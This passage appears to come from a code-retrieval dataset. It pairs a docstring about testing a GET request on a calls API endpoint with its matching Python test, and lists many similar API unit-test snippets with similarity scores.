404\n contact = client.get_contacts(urn=['tel:+52' + tel]).all()\n if contact:\n client.create_flow_start(\n flow=flow,\n contacts=[contact[0].uuid],\n )\n return jsonify({\"Inicio_flow\": \"Si\"}), 201\n return jsonify({\"Inicio_flow\": \"No\"}), 404", "def test_start_mdt(self):\n response = self.client.get(reverse('start-mdt', args=[self.sample_type]), follow=True)\n self.assertContains(response, self.proband.gel_id)\n self.assertEqual(response.status_code, 200)", "def post(self):\n data = api.payload\n\n try:\n phone_call_start = repository.find_start_call_by_call_id(data[\"call_id\"])\n except NoResultFound:\n return 'no call found by specified call id', 404\n\n phone_call_start.end_timestamp = parser.parse(data[\"end_timestamp\"]).replace(tzinfo=None)\n\n # repository.session.add(phone_call_start)\n repository.db.session.commit()\n\n return phone_call_start", "async def test_create_driver_dispatch_route(client):\n create_dispatch_route_params = null\n params = [('access_token', 'access_token_example')]\n headers = { \n 'Accept': 'application/json',\n 'Content-Type': 'application/json',\n }\n response = await client.request(\n method='POST',\n path='/v1/fleet/drivers/{driver_id}/dispatch/routes'.format(driver_id=56),\n headers=headers,\n json=create_dispatch_route_params,\n params=params,\n )\n assert response.status == 200, 'Response body is : ' + (await response.read()).decode('utf-8')", "def setUp(self):\n url = reverse('signup')\n self.response = self.client.post(url, {}) # submit an empty dictionary", "def test_too_late_incoming_call(self, *mocks):\n call_data = {\n 'sip_user_id': '123456789',\n 'caller_id': 'Test name',\n 'phonenumber': '0123456789',\n }\n\n two_weeks_ago = datetime.now() - timedelta(days=14)\n Device.objects.create(\n name='test device',\n token='a652aee84bdec6c2859eec89a6e5b1a42c400fba43070f404148f27b502610b6',\n sip_user_id='123456789',\n os_version='8.3',\n client_version='1.0',\n last_seen=two_weeks_ago,\n app=self.ios_app,\n )\n call_data['call_id'] = 'sduiqayduiryqwuioeryqwer76789'\n\n # Start thread to simulate asteriks waiting for response.\n thread = ThreadWithReturn(target=self.client.post, args=(self.incoming_url, call_data))\n thread.start()\n\n too_late_time = time.time()\n # Wait the wait time + 1 second.\n too_late_wait_time = (settings.APP_PUSH_ROUNDTRIP_WAIT + 1000) / 1000\n\n # Simulate some too long wait time for device to respond.\n time.sleep(too_late_wait_time)\n\n app_data = {\n 'unique_key': call_data['call_id'],\n 'message_start_time': too_late_time,\n }\n\n # Send the fake response from device which should be too late.\n too_late_response = self.client.post(self.response_url, app_data)\n\n self.assertEqual(too_late_response.status_code, 404)\n\n # Wait for the incoming-call to finish.\n response = thread.join()\n\n # Check if incoming-call resulted in a NAK.\n self.assertEqual(response.content, b'status=NAK')\n self.assertEqual(cache.get('attempts'), 3)", "def test_1():\n\tassert api_call().status_code == 200", "async def test_10() -> None:\n LOG.debug(\"Test post query (fail to access registered data (no token))\")\n payload = {\n \"referenceName\": \"MT\",\n \"start\": 9,\n \"referenceBases\": \"T\",\n \"alternateBases\": \"C\",\n \"assemblyId\": \"GRCh38\",\n \"datasetIds\": [\"urn:hg:1000genome:registered\"],\n \"includeDatasetResponses\": \"HIT\",\n }\n async with aiohttp.ClientSession() as session:\n async with session.post(\"http://localhost:5050/query\", data=json.dumps(payload)) as resp:\n data = await resp.json()\n assert \"WWW-Authenticate\" in resp.headers, \"Missing WWW-Authenticate header\"\n assert data[\"exists\"] is None, sys.exit(\"Query POST Endpoint Error!\")\n assert resp.status == 401, \"HTTP Status code error\"", "def test_tick(requests_mock, test_operator):\n tick_url = (\"https://habitica.com/api/v3/tasks/{}/score/up\"\n \"\".format(\"963e2ced-fa22-4b18-a22b-c423764e26f3\"))\n test_operator.tick_task(\"Test habit\")\n\n assert len(requests_mock.request_history) == 2\n tick_request = requests_mock.request_history[1]\n assert tick_url in tick_request.url", "def trigger_service(call):\n event = call.data.get(ATTR_EVENT)\n value1 = call.data.get(ATTR_VALUE1)\n value2 = call.data.get(ATTR_VALUE2)\n value3 = call.data.get(ATTR_VALUE3)\n if event is None:\n return\n\n try:\n import pyfttt as pyfttt\n pyfttt.send_event(key, event, value1, value2, value3)\n except requests.exceptions.RequestException:\n _LOGGER.exception(\"Error communicating with IFTTT\")", "def setUp(self):\n self.response = self.s.get(self.url, params=self.params)", "def test_make_request(self, m_requests, m_sleep):\r\n request = testing.DummyRequest({mut.URL_KEY: SAMPLE_URL})\r\n m_response, response_dict = self.mock_response()\r\n m_requests.get.return_value = m_response\r\n self.assertEqual(response_dict, mut.make_request(request))\r\n m_requests.get.assert_called_with(url=SAMPLE_URL)\r\n m_sleep.assert_called_with(mut.SECURITY_SLEEP)", "def test_new_user_request(self):\r\n # Send a request\r\n values = {'username': u'user100',\r\n 'external_id': '4', 'email': u'[email protected]'}\r\n data = json.dumps(values)\r\n headers = {'Content-Type': 'application/json', 'Content-Length': len(data), 'X-Edx-Api-Key': 'TEST_API_KEY'}\r\n req = urllib2.Request(self.server_url + '/api/v1/users/4', data, headers)\r\n\r\n # Send the request to the mock cs server\r\n response = urllib2.urlopen(req)\r\n\r\n # Receive the reply from the mock cs server\r\n response_dict = json.loads(response.read())\r\n\r\n # You should have received the response specified in the setup above\r\n self.assertEqual(response_dict, self.expected_response)", "def test_total_fund_start(self):\r\n with self.client as c:\r\n results = c.post(\r\n \"/fondo-para-retiros\",\r\n data=json.dumps(FONDO_PARA_RETIRO_JSON_1),\r\n headers=TestRetirementCalculator.request_headers,\r\n )\r\n data = json.loads(results.data)\r\n\r\n self.assertDictEqual(data, FONDO_PARA_RETIRO_RESULT_1)", "def test_post(self):\n # Create the request\n data = {\n 'device_date': '2017-01-01',\n 'device_type': 'sensor',\n 'status': 'online'\n }\n request_factory = RequestFactory()\n request = request_factory.post(reverse('filter_devices'), data)\n\n # Get the response\n response = FilterDevicesView.as_view()(request)\n self.assertEqual(response.status_code, 200)", "def startTestRun(self):", "def testWholeRequest(self):\n body = self.protocol.encode_message(self.request_message)\n self.Reinitialize(input=body,\n content_type=self.content_type)\n self.factory.add_request_mapper(self.mapper())\n self.service_handler.handle('POST', '/my_service', 'method1')\n VerifyResponse(self,\n self.service_handler.response,\n '200',\n 'OK',\n self.protocol.encode_message(self.response_message),\n self.content_type)", "async def test_pin_request_succeeds(hass: HomeAssistant) -> None:\n flow = config_flow.EcobeeFlowHandler()\n flow.hass = hass\n flow.hass.data[DATA_ECOBEE_CONFIG] = {}\n\n with patch(\"homeassistant.components.ecobee.config_flow.Ecobee\") as mock_ecobee:\n mock_ecobee = mock_ecobee.return_value\n mock_ecobee.request_pin.return_value = True\n mock_ecobee.pin = \"test-pin\"\n\n result = await flow.async_step_user(user_input={CONF_API_KEY: \"api-key\"})\n\n assert result[\"type\"] == data_entry_flow.FlowResultType.FORM\n assert result[\"step_id\"] == \"authorize\"\n assert result[\"description_placeholders\"] == {\"pin\": \"test-pin\"}", "async def setUp(self):\n self.requestor = Requestor(\"asyncprawcore:test (by /u/Lil_SpazJoekp)\")\n self.recorder = vcr", "def testSimpleLoadTestWithSubscription(self):\n def sendRequestExpect200():\n response = requests.get(\"http://localhost:%d/weather/alice\" % self.port_number)\n self.assertEqual(response.status_code, 200)\n self.assertEqual(response.text, 'cloudy')\n # Subscribe Alice to weather updates so that messages\n # are persisted when posted.\n response = requests.post(\"http://localhost:%d/weather/alice\" % self.port_number, data='')\n self.assertEqual(response.status_code, 200)\n # Check that server stays up after multiple requests.\n self.runMultipleRequests(100, sendRequestExpect200)", "def test_run_started(self):", "def _spy_on_make_request(self):\n data = {}\n\n def _make_request(api, url, body=None, method='GET', headers={},\n content_type=None):\n # We can't actually do any assertions in here, because they'll get\n # swallowed by SignalHook's sandboxing. We therefore record the\n # data we need and assert later.\n data['url'] = url\n data['request'] = json.loads(body)['request']\n return '{}'\n\n self.spy_on(TravisAPI._make_request, owner=TravisAPI,\n call_fake=_make_request)\n\n return data", "def test_post_setpoint_200(client, auth_header):\n data = {'value': 1}\n\n with client as cl:\n res = cl.post('/gpio/3/setpoint',\n headers=auth_header,\n data=json.dumps(data))\n\n assert res.status_code == 200\n assert res.headers.get('Content-Type') == 'application/json'\n assert json.loads(res.data.decode('utf8')) == data", "def test_api_use_ntc_post(self):\n body = Topup()\n response = self.client.open(\n '/api/use/ntc/',\n method='POST',\n data=json.dumps(body),\n content_type='application/json')\n self.assert200(response,\n 'Response body is : ' + response.data.decode('utf-8'))", "def test_registred(\n self, mock_get_ai_details, mock_get_ai, mock_get_purchased, mock_get_categories\n ):\n\n # We mock API calls\n mock_get_ai.return_value = self.ai\n mock_get_ai_details.return_value = self.ai_details\n mock_get_purchased.return_value.json.return_value = [\n factory.build(dict, FACTORY_CLASS=AiFactory),\n factory.build(dict, FACTORY_CLASS=AiFactory),\n factory.build(dict, FACTORY_CLASS=AiFactory)\n ]\n\n response = self.client.get(reverse(\n 'studio:skills',\n kwargs={\n 'aiid': self.ai['aiid']\n }\n ))\n self.assertEqual(response.status_code, 200)", "def test_cron(mock_post, test_operator, header_fx):\n test_operator.cron()\n mock_post.assert_called_with(\"https://habitica.com/api/v3/cron\",\n headers=header_fx)", "def test_rpcCall(self):\n pass", "def call(self, request, expect=error.OK):\n response = self.client.call(request)\n self.check_response(response, expect=expect)\n return response", "def test_not_available_incoming_call(self, *mocks):\n call_data = {\n 'sip_user_id': '123456789',\n 'caller_id': 'Test name',\n 'phonenumber': '0123456789',\n }\n\n two_weeks_ago = datetime.now() - timedelta(days=14)\n Device.objects.create(\n name='test device',\n token='a652aee84bdec6c2859eec89a6e5b1a42c400fba43070f404148f27b502610b6',\n sip_user_id='123456789',\n os_version='8.3',\n client_version='1.0',\n last_seen=two_weeks_ago,\n app=self.ios_app,\n )\n call_data['call_id'] = 'sduiqayduiryqwuioeryqwer76789'\n\n # Now the device exists, call it again in seperate thread.\n thread = ThreadWithReturn(target=self.client.post, args=(self.incoming_url, call_data))\n thread.start()\n\n # Simulate some wait-time before device responds.\n time.sleep(1.5)\n\n app_data = {\n 'unique_key': call_data['call_id'],\n 'message_start_time': time.time(),\n 'available': 'False',\n }\n # Send the fake response from device.\n self.client.post(self.response_url, app_data)\n\n # Wait for the incoming-call to finish.\n response = thread.join()\n\n # Check if incoming-call got accepted.\n self.assertEqual(response.content, b'status=NAK')\n self.assertEqual(cache.get('attempts'), 2)", "def test_create_event_load(self):\n res = self.client.get('/create-event')\n data = res.data.decode('utf-8')\n assert res.status == '200 OK'\n assert 'Create Event' in data", "def invoke():\n # CONFIG: Read configuration information\n config = conf.get_yaml_field(gl.configFile)\n dd_enable = config['ENABLE_DDING']\n dd_token = config['DD_TOKEN']\n dd_url = config['DING_URL']\n email_enable = config['EMAIL_ENABLE']\n # END CONFIG.\n\n # Test report file name.\n time_str = time.strftime('%Y%m%d_%H%M%S', time.localtime())\n path = RunTestCase.create_report_file()\n\n # Start test the send pin message.\n if dd_enable:\n scripts.send_msg_dding(\n '{}:★开始API接口自动化测试★'.format(time_str),\n dd_token,\n dd_url\n )\n\n # Execute the test and send the test report.\n RunTestCase.run(path)\n if dd_enable:\n # Template message.\n dir_list = path.split('\\\\')\n low_path = dir_list[len(dir_list) - 2]\n msg = RunTestCase.tmpl_msg(low_path)\n print(msg)\n scripts.send_msg_dding(msg, dd_token, dd_url)\n\n if email_enable:\n # Send test report to EMAIL.\n email = EmailClass()\n email.send(path)", "def test_api_use_method_post(self):\n body = Body()\n response = self.client.open(\n '/api/use/{method}/'.format(method='method_example'),\n method='POST',\n data=json.dumps(body),\n content_type='application/json')\n self.assert200(response,\n 'Response body is : ' + response.data.decode('utf-8'))", "def test_start_test(self):\n self.protocol.startTest(self.test)\n self.assertEqual(self.io.getvalue(), compat._b(\n \"test: %s\\n\" % self.test.id()))", "async def test_api_fire_event_with_data(\n hass: HomeAssistant, mock_api_client: TestClient\n) -> None:\n test_value = []\n\n @ha.callback\n def listener(event):\n \"\"\"Record that our event got called.\n\n Also test if our data came through.\n \"\"\"\n if \"test\" in event.data:\n test_value.append(1)\n\n hass.bus.async_listen_once(\"test_event_with_data\", listener)\n\n await mock_api_client.post(\"/api/events/test_event_with_data\", json={\"test\": 1})\n\n await hass.async_block_till_done()\n\n assert len(test_value) == 1" ]
[ "0.77212137", "0.7614569", "0.7375702", "0.69436055", "0.68681324", "0.6717918", "0.66508937", "0.63880897", "0.62512255", "0.61260146", "0.58564955", "0.5841628", "0.5779191", "0.57728964", "0.57675964", "0.56549394", "0.55403256", "0.54902625", "0.54620844", "0.5461441", "0.5435268", "0.5428295", "0.5424061", "0.5415708", "0.5410459", "0.53994805", "0.5396184", "0.5395218", "0.53943104", "0.5381876", "0.5381161", "0.5364877", "0.53572965", "0.53570443", "0.5353539", "0.5352352", "0.5351343", "0.53455323", "0.5336515", "0.5326417", "0.5318902", "0.531119", "0.5277401", "0.5274008", "0.5265764", "0.5265737", "0.52353746", "0.5227659", "0.5220983", "0.52084416", "0.5207116", "0.5206367", "0.5198736", "0.5193965", "0.5184583", "0.5178288", "0.5177758", "0.51773226", "0.51739186", "0.5169439", "0.5166063", "0.51582754", "0.5158", "0.5155905", "0.5154054", "0.5151226", "0.5147424", "0.51417124", "0.5140942", "0.51289076", "0.51235896", "0.5121843", "0.512142", "0.51178485", "0.51132125", "0.51118296", "0.5111586", "0.51061934", "0.5105804", "0.5105764", "0.51020896", "0.50895655", "0.50888884", "0.508849", "0.5087005", "0.50839853", "0.5077931", "0.50772524", "0.50746644", "0.5073821", "0.5072926", "0.5070094", "0.5068577", "0.50673974", "0.50498927", "0.5042398", "0.5032106", "0.5029588", "0.50244254", "0.5024075" ]
0.85472727
0
Test a GET request on the Call API Endpoint and expect it return 200 Ok
def test_GET_call_api_and_return_200Ok(client): url = '/api/v1/calls/' response = client.get(url) assert response.status_code == status.HTTP_200_OK
{ "objective": { "self": [], "paired": [], "triplet": [ [ "query", "document", "negatives" ] ] } }
[ "def test_get(self):\n self.assertEqual(200, self.resp.status_code)", "def test_get(self):\n self.assertEqual(200, self.resp.status_code)", "def test_1():\n\tassert api_call().status_code == 200", "def test_get(self):\n self.assertEqual(200, self.response.status_code)", "def test_get(self):\n self.assertEqual(200, self.response.status_code)", "def test_response_200_on_get(self):\n pass", "def test_status_ok(api_client):\n response = api_client.get()\n assert response.ok", "def test_get(self):\n expected_response = {\n 'id': 1111,\n 'first_name': 'Jhon',\n 'last_name': 'Doe',\n 'user_id': 1001,\n 'telegram_id': None\n }\n\n response = self.client.get(self.url)\n self.assertJSONEqual(json.dumps(expected_response), json.loads(response.content))\n self.assertEqual(response.status_code, 200)", "def test_get(self):\n client = RestClient(host=self.host, username='')\n rest_url = 'some/url/'\n \n # Mock good response\n with responses.RequestsMock() as rsps:\n rsps.add(responses.GET, f'{self.host}/{rest_url}', status=200,\n json={'value':\"good!\"})\n r = client.get(rest_url)", "def test_get_one(self):\n response = self.client.get('/api/v1/parcels/100')\n self.assertEqual(response.status_code, 200)", "def test_get(self):\n response = self.client.get(self.url)\n self.assertEqual(response.status_code, 200)", "def test_get(self):\n response = self.client.get(self.url)\n self.assertEqual(response.status_code, 200)", "def test_get(self):\n response = self.client.get('/weather/', format=\"json\")\n self.assertEqual(response.status_code, 200)", "def test_service_api_get(service_app):\n response = service_app.get('/')\n assert response.headers['Content-Type'] == 'application/json'\n assert response.status_code == 200\n assert json.loads(response.data) == {'description': 'service is up', 'status': 200}", "def test_get(self):\n return self.doRequest(self.url, method=\"GET\", body=self.input)", "def test_response_ok():\n\t\n\t# Send GET request to API given endpoint and store the response.\n\tresponse = get_items()\n\n\t# Confirm that the request-response cycle completed successfully.\n\t#assert_true(response.ok)\n\tif ('None' in response): print(\"Failed calling REST API: {}\".format(response))\n\telse: print(\"TC Passed, Response OK: {}\".format(response))", "def test_request():\n response = requests.get('http://jsonplaceholder.typicode.com/todos')\n assert response.ok", "def test_request(self):\n client = RestClient(host=self.host, username='')\n rest_url = 'some/url/'\n\n # Mock good get response\n with responses.RequestsMock() as rsps:\n rsps.add(responses.GET, f'{self.host}/{rest_url}', status=200,\n json={'value':\"good!\"})\n r = client.request('get', rest_url)\n assert r.status_code == 200\n assert r.json()['value'] == 'good!'\n \n # Mock bad get response\n with responses.RequestsMock() as rsps:\n rsps.add(responses.GET, f'{self.host}/{rest_url}', status=401,\n json={'value':\"bad!\"})\n with raises(requests.HTTPError):\n r = client.request('get', rest_url)\n r = client.request('get', rest_url, checkstatus=False)\n assert r.status_code == 401\n assert r.json()['value'] == 'bad!'", "def test_site_get_status_200_code(api_client):\n r = api_client.get(path=\"/\")\n assert r.status_code == 200", "def test_get_response(self):\n c = Client()\n response = c.get(reverse('index_view'))\n self.assertEqual(response.status_code, 200)", "def test_mock_get_ok(mock_get):\n\n # Configure the mock to return response/OK status code.\n mock_get.return_value.ok = True\n\n # Send GET request to API given endpoint and store the response.\n response = get_items()\n\n # Confirm that the request-response cycle completed successfully.\n if ('None' in response):\n print(\"Failed calling REST API: {}\".format(response))\n else:\n print(\"TC Passed, Response OK\".format(response))", "def test_get_requests(self):\n response = self.client.open('/api/provisioning/port',\n method='GET')\n self.assert200(response, \"Response body is : \" + response.data.decode('utf-8'))", "def test_hello(client):\n\n res = client.get('/api')\n assert res.get_json().get('msg') != None", "def test_ice_and_fire_external(self):\n response = self.client.get('/api/external-books?name=A Game of Thrones', format='json')\n self.assertEqual(200, response.data['status_code'])", "def test_api_response(self):\n # url = 'http://127.0.0.1:8000/api/aircraft/'\n url = reverse('airlines:aircraft-list')\n response = self.client.get(url, format='json')\n self.assertEqual(response.status_code, status.HTTP_200_OK)", "def test_users_endpoint_response_with_code_status_200():\n response = api_helper.get_users()\n assert response.status_code == 200", "def test_successful_on_get(self):\n\n url = '/%s/jobs/' % self.api\n\n response = self.client.get(url)\n self.assertEqual(response.status_code, status.HTTP_200_OK, response.content)", "def test_basic_fetch(client):\n\n res = client.get('/api/reminders')\n assert res.status_code == 200\n assert res.content_type == 'application/json'", "def test_mocked_get_api(self):\n c = Client()\n response = c.get(\"/apimock/mocked/api/account/154/\")\n self.assertEqual(response.status_code, 200)\n self.assertIn(\n '<table border=\"1\"><tr><th>amount</th><td>10PLN</td></tr></table>', response.content)\n response2 = c.get(\"/apimock/mocked/api/account/187/\")\n self.assertEqual(response2.status_code, 200)\n self.assertIn(\n '<table border=\"1\"><tr><th>amount</th><td>10PLN</td></tr></table>', response2.content)", "def test_two_legged_get(self):\n resp, content = self._two_legged(\"GET\")\n self.assertEqual(int(resp['status']), 200)", "def test_get_status(self):\n response = self.client.open(\n '/v1/status',\n method='GET')\n self.assert200(response,\n 'Response body is : ' + response.data.decode('utf-8'))", "def test_call(self):\n\n with Client('username', 'password') as client:\n self.setSessionResponse(content='{\"ok\": true}')\n data = client.call(**self.build_parameters)\n self.assertEqual(data, '{\"ok\": true}')", "def test_GET5(self):\n r = requests.get(self.address + \"/carca\")\n self.assertEqual(r.status_code, 400)", "def test_GET_fetcher():\n params = {\n 'key1':'value1',\n 'arg2':'value2'\n }\n\n ## test that request goes ok\n resp = wf_utils.fetch_GET_request(\n GET_ECHO_ENDPOINT,\n params=params\n )\n\n ## test that response json can be parsed\n payload = resp.json()\n\n ## test that response contains expected echo\n assert payload['args'] == params\n assert payload['headers']['user-agent'] == wf_utils.USER_AGENT", "def testGet(self):\n response = self.runGet(self.root)\n self.response_200(response)\n data = json.loads(response.content.decode(\"utf-8\"))\n self.assertEqual(len(data), 1)", "def test_root_response():\n request, response = app.test_client.get(\"/info.json\")\n assert response.status == 200", "def test_info_get(self):\n response = self.client.open(\n '/info',\n method='GET')\n self.assert200(response,\n 'Response body is : ' + response.data.decode('utf-8'))", "def test_response_is_200(BASE_URL, COUNTRY_CODE):\n # make request\n result = requests.get(f'{BASE_URL}{COUNTRY_CODE}')\n assert result.status_code == 200", "def test_get_request_normal_response(self, mock_get):\n\n # Arrange\n # Construct our mock response object, giving it relevant expected behaviours\n mock_resp_instance = MockResponse({\"msg\": \"success\"}, 200, content=\"abc\")\n mock_get.return_value = mock_resp_instance\n\n # Act\n response = get_request_data(self.url, json_resp=False)\n\n # Assert that the request-response cycle completed successfully.\n self.assertEqual(mock_resp_instance.status_code, 200)\n self.assertEqual(response, mock_resp_instance)", "def test_api_urls():\n # Test the status message - 404 not good , 200 good\n assert API_RH.create_req().status_code == 200, \"The tests for URLs were successful\"", "def test_get(self):\n url, port = self.server.address\n\n #couple of basic GETs\n r = self.client.get(\"http://{0}:{1}/\".format(url, port))\n self.assertEqual(200, r.status_code)\n r = self.client.get(\"http://{0}:{1}\".format(url, port))\n self.assertEqual(200, r.status_code)\n r = self.client.get(\"http://{0}:{1}/200\".format(url, port))\n self.assertEqual(200, r.status_code)\n r = self.client.get(\"http://{0}:{1}/400\".format(url, port))\n self.assertEqual(400, r.status_code)\n\n # GETs with params\n r = self.client.get(\"http://{0}:{1}/get_with_params\".format(url, port),\n params=self.params)\n self.assertEqual(200, r.status_code)\n self.assertEqual(str(self.params), r.text)\n\n # GETs with ...?", "def test_doGet(self) -> None:\n\n status_code = apicall.doGet(URL, self._browserheader)\n print(\"in do get:\", status_code)\n assert status_code == API_SUCCESS", "def test_GET(self):\n if not self.url:\n return\n response = self.client.get(self.url, {}, format='json')\n self.assertIn(response.status_code, [status.HTTP_405_METHOD_NOT_ALLOWED,\n status.HTTP_401_UNAUTHORIZED])", "def test_GET3(self):\n r = requests.get(self.address)\n self.assertEqual(r.status_code, 400)", "def test_getting_todos(mock_get):\n mock_get.return_value.ok = True\n\n # Call the service, which will send a request to the server.\n response = get_todos()\n\n # If the request is sent successfully, expect a response to be returned.\n assert response is not None", "def test_get_api(self):\n # Get metadata list\n _logger.info('Get sequencerun API')\n response = self.client.get('/sequencerun/')\n self.assertEqual(response.status_code, 200, 'Ok status response is expected')\n\n _logger.info('Check if API return result')\n result_response = response.data['results']\n self.assertGreater(len(result_response), 0, 'A result is expected')\n\n _logger.info('Check if unique data has a single entry')\n response = self.client.get('/sequencerun/?msg_attr_action=statuschanged')\n results_response = response.data['results']\n self.assertEqual(len(results_response), 1, 'Single result is expected for unique data')\n\n _logger.info('Check Invalid keyword')\n response = self.client.get('/sequencerun/?foo=bar')\n results_response = response.data['results']\n self.assertEqual(len(results_response), 0, 'No results are expected for unrecognized query parameter')", "def test_get_main_route():\n response = client.get(url)\n assert response.status_code == 200", "def test_services_endpoint(self):\n with open('demo/tests/mock_results.json', 'r') as result_file:\n data = result_file.read()\n expected_response = json.loads(data)[\"test_service_calls\"]\n\n responses.add(\n responses.GET,\n f'{os.environ[\"AIVEN_API_URL\"]}/v1/project/MY-PROJECT-NAME/service',\n json=expected_response,\n status=200\n )\n resp = requests.get(\n f'{os.environ[\"AIVEN_API_URL\"]}/v1/project/MY-PROJECT-NAME/service')\n\n assert resp.status_code == 200\n assert resp.json() == expected_response\n assert len(responses.calls) == 1\n expected_url = f'{os.environ[\"AIVEN_API_URL\"]}/v1/project/MY-PROJECT-NAME/service'\n assert responses.calls[0].request.url == expected_url\n assert \"MY-SERVICE-NAME\" in responses.calls[0].response.text\n assert responses.calls[0].response.json() == expected_response", "def test_get_request_success_json_data(self, mock_get):\n\n # Arrange\n # Construct our mock response object, giving it relevant expected behaviours\n mock_resp_instance = MockResponse({\"msg\": \"success\"}, 200)\n mock_get.return_value = mock_resp_instance\n\n # Act\n response = get_request_data(self.url)\n\n # Assert that the request-response cycle completed successfully.\n self.assertEqual(mock_resp_instance.status_code, 200)\n self.assertEqual(response, mock_resp_instance.json())", "def test_app(self):\n response = self.client.get('/')\n data = json.loads(response.data.decode())\n self.assertEqual(response.status_code, 200)\n self.assertIn('pong!', data['message'])\n self.assertIn('success', data['status'])", "def test_get_method(self):\n self.getPage('/')\n self.assertStatus('200 OK')\n self.assertHeader('Content-Type', 'application/json')\n self.assertBody('{\"mystring\": \"\"}')", "def test_simple_request(self):\n urls = [\"https://api.omniture.com/admin/1.4/rest/\",\n \"https://api2.omniture.com/admin/1.4/rest/\",\n \"https://api3.omniture.com/admin/1.4/rest/\",\n \"https://api4.omniture.com/admin/1.4/rest/\",\n \"https://api5.omniture.com/admin/1.4/rest/\"]\n self.assertIn(self.analytics.request('Company', 'GetEndpoint'),urls, \"Company.GetEndpoint failed\" )", "def test_health_endpoint(self):\n url = f\"{BASE_URL}/health\"\n response = requests.get(url)\n response_json = response.json()\n assert response.status_code == 200\n assert response_json['status'] == 200", "def test_ready(client):\n response = client.get('/api/ready')\n assert response.json == \"Ready\" \n assert response.status_code == 200", "def test_00_api_get(self):\r\n # GET as Anonymous\r\n url = '/api/'\r\n action = 'get'\r\n self.check_limit(url, action, 'app')", "def test_get_injuries(self):\n msg = \"Response status is not 200\"\n response = self.api.get_injuries()\n self.assertEqual(response.status_code, 200, msg)", "def test_ping(self):\n response = self.client.get(reverse(\"api_hello:ping\"))\n self.assertTrue(response.json()[\"status\"])", "def test_http_request(self):\n\n response = requests.get(self.live_server_url)\n assert response.status_code == 200", "def test_request_ok(self, method, m_requests):\n # Dummy values for the K8s API request.\n url = 'http://examples.com/'\n client = k8s.requests.Session()\n headers = {\"some\": \"headers\"}\n payload = {\"some\": \"payload\"}\n response = {\"some\": \"response\"}\n\n # Verify the makeup of the actual request.\n def additional_matcher(req):\n assert req.method == method\n assert req.url == url\n assert req.json() == payload\n assert req.headers[\"some\"] == headers[\"some\"]\n assert req.timeout == 30\n return True\n\n # Assign a random HTTP status code.\n status_code = random.randint(100, 510)\n m_requests.request(\n method,\n url,\n json=response,\n status_code=status_code,\n additional_matcher=additional_matcher,\n )\n\n # Verify that the function makes the correct request and returns the\n # expected result and HTTP status code.\n ret = k8s.request(client, method, url, payload, headers)\n assert ret == (response, status_code)", "async def test_get_booking(client):\n headers = { \n 'Accept': 'application/json',\n 'Authorization': 'Bearer special-key',\n }\n response = await client.request(\n method='GET',\n path='/vms/api/v1/bookings/{booking_id}'.format(booking_id='booking_id_example'),\n headers=headers,\n )\n assert response.status == 200, 'Response body is : ' + (await response.read()).decode('utf-8')", "def test_resourcenotfound():\n\n URL_STR = \"http://52.24.157.193:5000/api/fibonacci/foo\"\n response = requests.get( URL_STR )\n data = response.json()\n assert response.status_code == 404", "def test_trucks_api_error(self):\n resp = self.app.get('/asfdasdf')\n self.assertEqual(resp.status_code, 404)\n assert \"NOT FOUND\" in resp.status", "def api_call():\n\tresponse = requests.get(URL_API)\n\treturn response", "def test_api(test_name, endpoint, method, body, expected_response, expected_status_code, validation, params):\n response = None\n with allure.step(' '.join(['getting API response on endpoint:', str(endpoint)])):\n response = APIRequestor().request(method=method, url_path=endpoint, body=body, params=params)\n with allure.step(' '.join(['Asserting API status code expected:', str(expected_status_code), ', with response:', str(response.status_code)])):\n Compare.equal.__call__(a=expected_status_code, b=response.status_code, free_text=f\"Status code is not as expected: {response.status_code} instead of expected: {expected_status_code}\")\n with allure.step('starting API validation'):\n validation = 'equal' if not validation else validation\n with allure.step(' '.join(['Validation with method:', str(validation)])):\n Compare.__dict__[validation](a=str(response), b=str(expected_response),\n free_text=f\"Failed to compare, Response is not as expected: {response} instead of {expected_response}\")", "def test_profile_api_get(self):\n response = self.client.get(self.url)\n self.assertEqual(response.status_code, 200)", "def test_request_response():\n response = get_todos()\n assert response is not None", "async def test_api_status(hass: HomeAssistant, mock_api_client: TestClient) -> None:\n resp = await mock_api_client.get(\"/api/\")\n assert resp.status == HTTPStatus.OK\n json = await resp.json()\n assert json[\"message\"] == \"API running.\"", "def test_GET4(self):\n r = requests.get(self.address + \"/carcar/23\")\n self.assertEqual(r.status_code, 400)", "def test_view_success_code(self):\n response = self.client.get(self.get_url())\n self.assertEqual(response.status_code, 200)", "def test_view_success_code(self):\n response = self.client.get(self.get_url())\n self.assertEqual(response.status_code, 200)", "def test_view_success_code(self):\n response = self.client.get(self.get_url())\n self.assertEqual(response.status_code, 200)", "def test_view_success_code(self):\n response = self.client.get(self.get_url())\n self.assertEqual(response.status_code, 200)", "def test_view_success_code(self):\n response = self.client.get(self.get_url())\n self.assertEqual(response.status_code, 200)", "def test_view_success_code(self):\n response = self.client.get(self.get_url())\n self.assertEqual(response.status_code, 200)", "def test_view_success_code(self):\n response = self.client.get(self.get_url())\n self.assertEqual(response.status_code, 200)", "def test_view_success_code(self):\n response = self.client.get(self.get_url())\n self.assertEqual(response.status_code, 200)", "def test_view_success_code(self):\n response = self.client.get(self.get_url())\n self.assertEqual(response.status_code, 200)", "def test_view_success_code(self):\n response = self.client.get(self.get_url())\n self.assertEqual(response.status_code, 200)", "def test_view_success_code(self):\n response = self.client.get(self.get_url())\n self.assertEqual(response.status_code, 200)", "def test_view_success_code(self):\n response = self.client.get(self.get_url())\n self.assertEqual(response.status_code, 200)", "def test_view_success_code(self):\n response = self.client.get(self.get_url())\n self.assertEqual(response.status_code, 200)", "def test_view_success_code(self):\n response = self.client.get(self.get_url())\n self.assertEqual(response.status_code, 200)", "def test_view_success_code(self):\n response = self.client.get(self.get_url())\n self.assertEqual(response.status_code, 200)", "def test_view_success_code(self):\n response = self.client.get(self.get_url())\n self.assertEqual(response.status_code, 200)", "def test_view_success_code(self):\n response = self.client.get(self.get_url())\n self.assertEqual(response.status_code, 200)", "def test_view_success_code(self):\n response = self.client.get(self.get_url())\n self.assertEqual(response.status_code, 200)", "def test_view_success_code(self):\n response = self.client.get(self.get_url())\n self.assertEqual(response.status_code, 200)", "def test_view_success_code(self):\n response = self.client.get(self.get_url())\n self.assertEqual(response.status_code, 200)", "def test_view_success_code(self):\n response = self.client.get(self.get_url())\n self.assertEqual(response.status_code, 200)", "def test_view_success_code(self):\n response = self.client.get(self.get_url())\n self.assertEqual(response.status_code, 200)", "def test_view_success_code(self):\n tmp = self.get_url()\n response = self.client.get(tmp)\n self.assertEqual(response.status_code, 200)", "def test_view_success_code(self):\n tmp = self.get_url()\n response = self.client.get(tmp)\n self.assertEqual(response.status_code, 200)", "def test_view_success_code(self):\n 